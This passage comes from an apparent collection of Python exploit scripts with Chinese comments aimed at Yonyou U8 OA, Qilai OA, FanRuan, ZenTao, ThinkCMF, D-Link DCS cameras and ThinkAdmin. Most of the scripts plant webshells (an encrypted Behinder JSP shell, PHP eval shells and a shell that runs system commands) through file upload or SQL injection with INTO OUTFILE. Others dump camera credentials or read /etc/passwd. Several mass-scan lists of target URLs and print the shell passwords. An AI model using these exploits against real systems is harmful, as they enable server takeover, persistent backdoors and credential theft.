print('+------------------------------------------') 14 | 15 | #随机ua 16 | def get_ua(): 17 | first_num = random.randint(55, 62) 18 | third_num = random.randint(0, 3200) 19 | fourth_num = random.randint(0, 140) 20 | os_type = [ 21 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 22 | '(Macintosh; Intel Mac OS X 10_12_6)' 23 | ] 24 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 25 | 26 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 27 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 28 | ) 29 | return ua 30 | 31 | 32 | def POC_1(target_url): 33 | vuln_url_2 = target_url + "/page/exportImport/uploadOperation.jsp" 34 | print('\033[36m[+] 正在请求: {}'.format(vuln_url_2)) 35 | headers = { 36 | "User-Agent": get_ua(), 37 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc", 38 | "Connection": "close", 39 | "Content-Length": "500" 40 | } 41 | files = { 42 | 'file': ('update.jsp','<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);out.print(666);}%><%out.print(666);%>','application/octet-stream') 43 | } 44 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 45 | response = requests.post(url=vuln_url_2, headers=headers, files=files, verify=False,timeout=10) 46 | test_webshell(target_url) 47 | 48 | 49 | def test_webshell(target_url): 50 | webshell_url = target_url + "/page/exportImport/fileTransfer/update.jsp" 51 | headers = {"User-Agent": get_ua()} 52 | try: 53 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 54 | response = requests.get(url=webshell_url, timeout=10, verify=False, headers=headers) 55 | print("\033[32m[+] 正在请求 : {}/page/exportImport/fileTransfer/update.jsp\033[0m".format(target_url)) 56 | if '666' in response.text and response.status_code == 200: 57 | print("\033[32m[+] 目标 {} 成功上传 webshell : {}/page/exportImport/fileTransfer/update.jsp\033[0m".format(target_url,target_url)) 58 | print("\033[32m[+] webshell地址:{}/page/exportImport/fileTransfer/update.jsp \033[0m".format(target_url)) 59 | print("\033[32m[+] 冰蝎3默认马 pass :rebeyond \033[0m".format(target_url)) 60 | else: 61 | print("\033[31m[x] 目标漏洞无法利用,写入失败 \033[0m") 62 | sys.exit(0) 63 | 64 | except Exception as e: 65 | print("\033[31m[x] 目标漏洞无法利用,写入失败 {} \033[0m".format(e)) 66 | sys.exit(0) 67 | 68 | if __name__ == '__main__': 69 | title() 70 | target_url = str(input("\033[35m请输入需要测试的url地址:\033[0m")) 71 | POC_1(target_url) 72 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/getshell_exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | import json 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | 10 | def title(): 11 | print('+------------------------------------------') 12 | print('+ \033[34mVersion: 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') 13 | print('+ \033[36m使用格式: python3 getshell_exp.py \033[0m') 14 | print('+ \033[36mURL地址: http://xxx.xxx.xxx.xxx \033[0m') 15 | print('+------------------------------------------') 16 | 17 | def POC_1(target_url): 18 | vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)" 19 | try: 20 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 21 | response = requests.get(url=vuln_url, verify=False, timeout=5) 22 | if '序号' in response.text and "@@basedir" in response.text and response.status_code == 200: 23 | OA_dir = re.findall(r'>(.*)\\mysql\\', response.text)[0] 24 | OA_dir = OA_dir.replace("\\","/") 25 | print("\033[32m[+]目标 {} 存在SQL注入漏洞".format(target_url)) 26 | webshell_name = "update_{}.jsp".format(random.randint(1,5)) 27 | OA_dir = OA_dir + "/tomcat/webapps/yyoa/{}".format(webshell_name) 28 | POC_2(target_url, OA_dir, webshell_name) 29 | else: 30 | print("\033[31m[x]目标 {} 不存在SQL注入漏洞 \033[0m".format(target_url)) 31 | except Exception as e: 32 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url), e) 33 | 34 | def POC_2(target_url, OA_dir, webshell_name): 35 | vuln_url = target_url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20unhex(%273c25407061676520696d706f72743d226a6176612e7574696c2e2a2c6a617661782e63727970746f2e2a2c6a617661782e63727970746f2e737065632e2a22253e3c2521636c617373205520657874656e647320436c6173734c6f616465727b5528436c6173734c6f616465722063297b73757065722863293b7d7075626c696320436c61737320672862797465205b5d62297b72657475726e2073757065722e646566696e65436c61737328622c302c622e6c656e677468293b7d7d253e3c2569662028726571756573742e6765744d6574686f6428292e657175616c732822504f53542229297b537472696e67206b3d2235383233636433303933663136663362223b73657373696f6e2e70757456616c7565282275222c6b293b43697068657220633d4369706865722e676574496e7374616e6365282241455322293b632e696e697428322c6e6577205365637265744b657953706563286b2e676574427974657328292c224145532229293b6e6577205528746869732e676574436c61737328292e676574436c6173734c6f616465722829292e6728632e646f46696e616c286e65772073756e2e6d6973632e4241534536344465636f64657228292e6465636f646542756666657228726571756573742e67657452656164657228292e726561644c696e6528292929292e6e6577496e7374616e636528292e657175616c732870616765436f6e74657874293b7d253e%27)%20%20into%20outfile%20%27{}%27".format(OA_dir) 36 | webshell_dir = target_url +"/yyoa/"+ webshell_name 37 | try: 38 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 39 | response = requests.get(url=vuln_url, verify=False, timeout=5) 40 | if 'already' in response.text and response.status_code == 200: 41 | print("\033[32m[+]文件写入木马上传失败,目标已存在相同文件,请重新运行\033[0m") 42 | elif "No Data" in response.text and response.status_code == 200: 43 | print("\033[32m[+]文件写入木马上传成功,上传路径为 {}\033[0m".format(webshell_dir)) 44 | print("\033[32m[+]请使用冰蝎连接,密码为: bxmm\033[0m") 45 | else: 46 | print("\033[31m[x] 目标 {} 木马上传失败 \033[0m".format(target_url)) 47 | except Exception as e: 48 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url), e) 49 | 50 | 51 | if __name__ == '__main__': 52 | title() 53 | target_url = str(input("\033[35m请输入需要检测的URL地址:\033[0m")) 54 | POC_1(target_url) 55 | -------------------------------------------------------------------------------- /启莱OA/启莱OA_treelist.aspx_SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: 启莱OA treelist.aspx SQL注入漏洞 \033[0m') 10 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 11 | print('+ \033[36m文件名: url.txt \033[0m') 12 | print('+------------------------------------------') 13 | 14 | #随机ua 15 | def get_ua(): 16 | first_num = random.randint(55, 62) 17 | third_num = random.randint(0, 3200) 18 | fourth_num = random.randint(0, 140) 19 | os_type = [ 20 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 21 | '(Macintosh; Intel Mac OS X 10_12_6)' 22 | ] 23 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 24 | 25 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 26 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 27 | ) 28 | return ua 29 | 30 | 31 | def poc(url): 32 | vuln_url = url + "/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1" 33 | headers = { 34 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 35 | } 36 | try: 37 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 38 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 39 | if "nvarchar" in response.text and response.status_code == 500: 40 | with open('success.txt', 'a', encoding='utf8') as vul: 41 | vul.write("{} \n".format(vuln_url)) 42 | print("\033[32m[+]目标 {} 存在SQL注入漏洞 \n[+]响应地址:\n{} \033[0m".format(url, vuln_url)) 43 | else: 44 | print("\033[31m[x]目标 {} 不存在SQL注入漏洞 \033[0m".format(target_url)) 45 | except Exception as e: 46 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url)) 47 | 48 | 49 | def Scan(file_name): 50 | header={"User-Agent": get_ua(),} 51 | with open(file_name, "r", encoding='utf8') as scan_url: 52 | for url in scan_url: 53 | if url[:4] != "http": 54 | url = "http://" + url 55 | url = url.strip('\n') 56 | try: 57 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 58 | httpError = False 59 | try: 60 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 61 | except Exception as e: 62 | httpError = True 63 | if not httpError and req.status_code == 200: 64 | print("\033[32m[+]正在请求{}".format(url)) 65 | else: 66 | url = url.replace("http","https") 67 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 68 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 69 | if req.status_code == 200: 70 | print("\033[32m[+]正在请求{}".format(url)) 71 | else: 72 | pass 73 | except Exception as e: 74 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 75 | else: 76 | pass 77 | try: 78 | poc(url) 79 | 80 | except Exception as e: 81 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 82 | continue 83 | if __name__ == '__main__': 84 | title() 85 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 86 | Scan(file_name) 87 | -------------------------------------------------------------------------------- /用友OA/用友U8_OA_SQL注入/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 6 | 7 | def title(): 8 | print('+------------------------------------------') 9 | print('+ \033[34mVersion: 用友 U8 OA test.jsp SQL注入漏洞 \033[0m') 10 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 11 | print('+ \033[36m文件名: url.txt \033[0m') 12 | print('+------------------------------------------') 13 | 14 | #随机ua 15 | def get_ua(): 16 | first_num = random.randint(55, 62) 17 | third_num = random.randint(0, 3200) 18 | fourth_num = random.randint(0, 140) 19 | os_type = [ 20 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 21 | '(Macintosh; Intel Mac OS X 10_12_6)' 22 | ] 23 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 24 | 25 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 26 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 27 | ) 28 | return ua 29 | 30 | 31 | def poc(url): 32 | vuln_url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))" 33 | headers = { 34 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 35 | } 36 | try: 37 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 38 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 39 | if "c4ca4238a0b923820dcc509a6f75849b" in response.text and response.status_code == 200: 40 | with open('success.txt', 'a', encoding='utf8') as vul: 41 | vul.write("{} \n".format(url)) 42 | print("\033[32m[+]目标 {} 存在SQL注入漏洞 \n[+]响应地址:\n{} \033[0m".format(url, vuln_url)) 43 | else: 44 | print("\033[31m[x]目标 {} 不存在SQL注入漏洞 \033[0m".format(target_url)) 45 | except Exception as e: 46 | print("\033[31m[x]目标 {} 请求失败 \033[0m".format(target_url)) 47 | 48 | 49 | def Scan(file_name): 50 | header={"User-Agent": get_ua(),} 51 | with open(file_name, "r", encoding='utf8') as scan_url: 52 | for url in scan_url: 53 | if url[:4] != "http": 54 | url = "http://" + url 55 | url = url.strip('\n') 56 | try: 57 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 58 | httpError = False 59 | try: 60 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 61 | except Exception as e: 62 | httpError = True 63 | if not httpError and req.status_code == 200: 64 | print("\033[32m[+]正在请求{}".format(url)) 65 | else: 66 | url = url.replace("http","https") 67 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 68 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 69 | if req.status_code == 200: 70 | print("\033[32m[+]正在请求{}".format(url)) 71 | else: 72 | pass 73 | except Exception as e: 74 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 75 | else: 76 | pass 77 | try: 78 | poc(url) 79 | 80 | except Exception as e: 81 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 82 | continue 83 | if __name__ == '__main__': 84 | title() 85 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 86 | Scan(file_name) 87 | -------------------------------------------------------------------------------- /zentao-getshell/exp.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import requests 3 | import base64 4 | import re 5 | import sys 6 | import os 7 | import json 8 | 9 | 10 | banner = ''' 11 | ________ _______ .__ __. .___________. ___ ______ 12 | | / | ____|| \ | | | | / \ / __ \ 13 | `---/ / | |__ | \| | `---| |----` / ^ \ | | | | 14 | / / | __| | . ` | | | / /_\ \ | | | | 15 | / /----.| |____ | |\ | | | / _____ \ | `--' | 16 | /________||_______||__| \__| |__| /__/ \__\ \______/ 17 | 18 | v8.2 - 9.2.1 Getshell 19 | 20 | python by jas502n 21 | 22 | usage: python exp.py http://127.0.0.1:81/zentao webshell.php 23 | 24 | ''' 25 | print banner 26 | 27 | def get_web_dir(url,filename): 28 | if url[-1] == '/': 29 | url = url[:-1] 30 | else: 31 | url = url 32 | 33 | payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}''' 34 | base64encode_str = base64.b64encode(payload) 35 | web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64encode_str 36 | version_url = url + "/zentao/index.php?mode=getconfig" 37 | r0 = requests.get(url=version_url) 38 | json_str = json.loads(r0.text) 39 | print "Cuurent Version= " + json_str['version'] 40 | print '\n' + web_dir 41 | 42 | headers = { 43 | "Referer":"http://127.0.0.1:81/zentao", 44 | "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 45 | } 46 | 47 | r= requests.get(url=web_dir, headers=headers) 48 | if r.status_code==200 and 'SELECT' in r.content: 49 | print '\n' 50 | print r.content 51 | m = re.compile(r'.*in <strong>(.*)</strong> on') 52 | print 53 | www_dir = m.findall(r.content)[0] 54 | www_root = www_dir.replace('\\', "//") 55 | print www_root 56 | m = re.compile(r'(.*)framework',re.DOTALL) 57 | 58 | # print '>>>>WWWROOT INSTALL: ' + 59 | get_shell = "select '<?php @eval($_POST[1])?>' into outfile '%s'" % (m.findall(www_root)[0] + 'www//' + filename) 60 | print '\n%s\n' % get_shell 61 | hex_str = get_shell.encode('hex') 62 | payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str 63 | getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64.b64encode(payload1) 64 | # print "GetShell_URL=\n\n%s" % getshell_url 65 | 66 | headers = { 67 | "Referer":"%s/zentao"%url, 68 | "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0" 69 | } 70 | r1 = requests.get(url=getshell_url,headers=headers) 71 | if r1.status_code == 200 and 'ID' in r1.content: 72 | print getshell_url 73 | 74 | webshell = url + "/zentao/" + filename 75 | r2 = requests.get(url=webshell) 76 | if r2.status_code == 200: 77 | print "\n\n>>>>Webshell: \n%s" % webshell 78 | else: 79 | print "No Webshell Exit!" 80 | else: 81 | print "No Send Success into file!" 82 | 83 | 84 | else: 85 | print "No Exit!" 86 | 87 | 88 | 89 | 90 | if __name__ == "__main__": 91 | # url = "http://127.0.0.1:81/" 92 | url = sys.argv[1] 93 | filename = sys.argv[2] 94 | get_web_dir(url,filename) 95 | -------------------------------------------------------------------------------- /帆软OA/帆软OA_V9getshell/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 4 | 5 | def title(): 6 | print('+------------------------------------------') 7 | print('+ \033[34mVersion: 帆软OA V9 getshell \033[0m') 8 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 9 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 10 | print('+ \033[36mFile >>> ip.txt \033[0m') 11 | print('+------------------------------------------') 12 | 13 | def POC_1(target_url): 14 | vuln_url_1 = target_url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/index1.jsp" 15 | print('\033[36m[o] 正在请求: {}'.format(vuln_url_1)) 16 | headers = { 17 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 18 | "Content-Type": "application/x-www-form-urlencoded", 19 | } 20 | data = '''{"__CONTENT__":"<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>","__CHARSET__":"UTF-8"}''' 21 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 22 | response = requests.post(url=vuln_url_1, headers=headers, timeout=5, data=data, verify=False) 23 | webshell_url = target_url + "/WebReport/index1.jsp" 24 | try: 25 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 26 | response = requests.get(url=webshell_url, timeout=5, verify=False, headers=headers) 27 | if response.status_code == 200 : 28 | with open('webshell.txt', 'a', encoding='utf8') as vu: 29 | vu.write("目标 {} 被上传木马: {}/WebReport/index1.jsp\n".format(target_url, target_url)) 30 | print("\033[32m[+] 目标 {} 被上传木马: {}/WebReport/index1.jsp \033[0m".format(target_url, target_url)) 31 | except Exception as e: 32 | print("\033[31m[x] 请求报错 \033[0m".format(e)) 33 | 34 | def Scan(file_name): 35 | with open(file_name, "r", encoding='utf8') as scan_url: 36 | for url in scan_url: 37 | if url[:4] != "http": 38 | url = "http://" + url 39 | url = url.strip('\n') 40 | try: 41 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 42 | req = requests.get(url=url, headers=headers, verify=False, timeout=5) 43 | if req.status_code == 200: 44 | print("\033[32m[+] 正在请求{}".format(url)) 45 | else: 46 | url = url.replace("http","https") 47 | req = requests.get(url=url, headers=headers, verify=False, timeout=5) 48 | if req.status_code == 200: 49 | print("\033[32m[+] 正在请求{}".format(url)) 50 | else: 51 | pass 52 | except Exception as e: 53 | print("\033[31m[x] "+url+"访问失败 \033[0m".format(e)) 54 | try: 55 | POC_1(url) 56 | 57 | except Exception as e: 58 | print("\033[31m[x] "+url+"请求报错 \033[0m".format(e)) 59 | continue 60 | if __name__ == '__main__': 61 | title() 62 | file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m")) 63 | Scan(file_name) 64 | -------------------------------------------------------------------------------- /ThinkCMF/ThinkCMF_getshell_exp.py: -------------------------------------------------------------------------------- 1 | import urllib3 2 | import requests,sys,json 3 | from argparse import ArgumentParser 4 | from time import time 5 | from urllib import parse 6 | import threadpool 7 | 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | filename = sys.argv[1] 10 | url_list=[] 11 | t = open('shell.txt','w') 12 | 13 | def ThinkCMF_getshell(url): 14 | vuln_url = url + R'''/index.php?a=fetch&templateFile=public/inde&prefix=%27%27&content=<php>file_put_contents('92379705dac844c0.php','%3c%3f%70%68%70%0d%0a%65%63%68%6f%20%6d%64%35%28%22%54%68%69%6e%6b%43%4d%46%22%29%3b%0d%0a%20%20%20%20%69%66%28%69%73%73%65%74%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%29%7b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%24%63%6d%64%20%3d%20%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%73%79%73%74%65%6d%28%24%63%6d%64%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%2f%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%64%69%65%3b%0d%0a%20%20%20%20%7d%0d%0a%70%68%70%69%6e%66%6f%28%29%3b%0d%0a%3f%3e')</php>''' 15 | r = requests.get(vuln_url,timeout=15,verify=False) 16 | response_str = json.dumps(r.headers.__dict__['_store']) 17 | # print(response_str) #响应头 18 | if r.status_code == 200 and 'PHP' in response_str: 19 | print ("[+]" + str(r.headers.get('Server'))) 20 | print ("[+]" + str(r.headers.get('X-Powered-By'))) 21 | check_shell(url) 22 | else: 23 | print ("[-]%s :No Exit ThinkCMF Vuln" %url) 24 | 25 | def check_shell(url): 26 | shell_url = url + '/92379705dac844c0.php' 27 | r = requests.get(shell_url,timeout=15,verify=False) 28 | if r.status_code == 200 and "92379705dac844c0" in r.text: 29 | print ("\033[32m[+]CMD Shell url:\033[0m") 30 | print ("\033[32m[+]%s/92379705dac844c0.php?cmd=whoami\033[0m" %url) 31 | t.write("%s/92379705dac844c0.php?cmd=whoami\n" %url) 32 | print ("\033[32m[+]蚁剑无文件连接url:\033[0m") 33 | shell2_url=url + R'''/index.php?a=fetch&templateFile=public/inde&prefix=%27%27&content=%3C?php%20@eval($_POST[%27m2%27]);?%3E''' 34 | print ("\033[32m[+]%s\033[0m" %shell2_url) 35 | print ("\033[32m[+]pass: m2\033[0m") 36 | else: 37 | print ("[-]%s :No Exit ThinkCMF Vuln" %url) 38 | 39 | 40 | def multithreading(url_list, pools=5): 41 | works = [] 42 | for i in url_list: 43 | works.append(i) 44 | pool = threadpool.ThreadPool(pools) 45 | reqs = threadpool.makeRequests(ThinkCMF_getshell, works) 46 | [pool.putRequest(req) for req in reqs] 47 | pool.wait() 48 | 49 | if __name__ == '__main__': 50 | show = r''' 51 | 52 | _____ _ _ _ _____ ___ _________ 53 | |_ _| | (_) | | / __ \| \/ || ___| 54 | | | | |__ _ _ __ | | _| / \/| . . || |_ _____ ___ __ 55 | | | | '_ \| | '_ \| |/ / | | |\/| || _| / _ \ \/ / '_ \ 56 | | | | | | | | | | | <| \__/\| | | || | | __/> <| |_) | 57 | \_/ |_| |_|_|_| |_|_|\_\\____/\_| |_/\_| \___/_/\_\ .__/ 58 | ______ | | 59 | |______| |_| 60 | 61 | getshell_exp by m2 62 | ''' 63 | print(show + '\n') 64 | arg=ArgumentParser(description='ThinkCMF_getshell_exp By m2') 65 | arg.add_argument("-u", 66 | "--url", 67 | help="Target URL; Example:http://ip:port") 68 | arg.add_argument("-f", 69 | "--file", 70 | help="Target URL; Example:url.txt") 71 | args=arg.parse_args() 72 | url=args.url 73 | filename=args.file 74 | start=time() 75 | if url != None and filename == None: 76 | url=parse.urlparse(url) 77 | url=url.scheme + '://' + url.netloc 78 | ThinkCMF_getshell(url) 79 | elif url == None and filename != None: 80 | for i in open(filename): 81 | i=i.replace('\n','') 82 | url=parse.urlparse(i) 83 | url=url.scheme + '://' + url.netloc 84 | url_list.append(url) 85 | multithreading(url_list,10) 86 | end=time() 87 | t.close() 88 | print('任务完成,用时%d' %(end-start)) 89 | -------------------------------------------------------------------------------- /D-Link_DCS系列监控/poc.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 | 9 | def title(): 10 | print('+------------------------------------------') 11 | print('+ \033[34mTitle: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078 \033[0m') 12 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 13 | print('+ \033[36m文件名: url.txt \033[0m') 14 | print('+------------------------------------------') 15 | 16 | #随机ua 17 | def get_ua(): 18 | first_num = random.randint(55, 62) 19 | third_num = random.randint(0, 3200) 20 | fourth_num = random.randint(0, 140) 21 | os_type = [ 22 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 23 | '(Macintosh; Intel Mac OS X 10_12_6)' 24 | ] 25 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 26 | 27 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 28 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 29 | ) 30 | return ua 31 | 32 | def POC_1(target_url): 33 | vuln_url = target_url + "/config/getuser?index=0" 34 | headers = { 35 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 36 | } 37 | try: 38 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 39 | response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) 40 | print("\033[36m[+] 正在请求 {}/config/getuser?index=0 \033[0m".format(target_url)) 41 | if 'priv' in response.text and response.status_code == 200: 42 | res=response.text.strip() 43 | result=re.findall(r'(.*)\r\npriv',res,re.S) 44 | result=result[0] 45 | with open('success.txt', 'a', encoding='utf8') as vul: 46 | vul.write("{}\n{}\n".format(target_url,result)) 47 | print("\033[32m[+] 目标 {} 存在漏洞 \033[0m".format(target_url)) 48 | else: 49 | print("\033[31m[x] 请求失败 \033[0m") 50 | 51 | except Exception as e: 52 | print("\033[31m[x] 请求失败 \033[0m", e) 53 | 54 | def Scan(file_name): 55 | header={"User-Agent": get_ua(),} 56 | with open(file_name, "r", encoding='utf8') as scan_url: 57 | for url in scan_url: 58 | if url[:4] != "http": 59 | url = "http://" + url 60 | url = url.strip('\n') 61 | try: 62 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 63 | httpError = False 64 | try: 65 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 66 | except Exception as e: 67 | httpError = True 68 | if not httpError and req.status_code == 200: 69 | print("\033[32m[+] 正在请求 {}".format(url)) 70 | else: 71 | url = url.replace("http","https") 72 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 73 | req = requests.get(url=url, headers=header, verify=False, timeout=10) 74 | if req.status_code == 200: 75 | print("\033[32m[+] 正在请求 {}".format(url)) 76 | else: 77 | pass 78 | except Exception as e: 79 | print("\033[31m[x] "+url+" 访问失败 \033[0m".format(e)) 80 | else: 81 | pass 82 | try: 83 | POC_1(url) 84 | 85 | except Exception as e: 86 | print("\033[31m[x] "+url+"请求报错 \033[0m".format(e)) 87 | continue 88 | 89 | 90 | if __name__ == '__main__': 91 | title() 92 | file_name = str(input("\033[35m请输入需要检测的文件名:\033[0m")) 93 | Scan(file_name) 94 | 95 | -------------------------------------------------------------------------------- /ThinkAdmin/ThinkAdminScan.py: -------------------------------------------------------------------------------- 1 | # by : YaunSky 2 | # 时间 : 2020-12-06 3 | # 内容 : ThinkAdmin 任意文件读取 (脚本读取/etc/passwd) 4 | 5 | 6 | import requests 7 | import json 8 | import base64 9 | import urllib3 10 | import random 11 | 12 | urllib3.disable_warnings() 13 | requests.packages.urllib3.disable_warnings() 14 | 15 | USER_AGENTS = [ 16 | "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", 17 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", 18 | "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", 19 | "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko", 20 | "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", 21 | "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", 22 | "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5", 23 | "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) 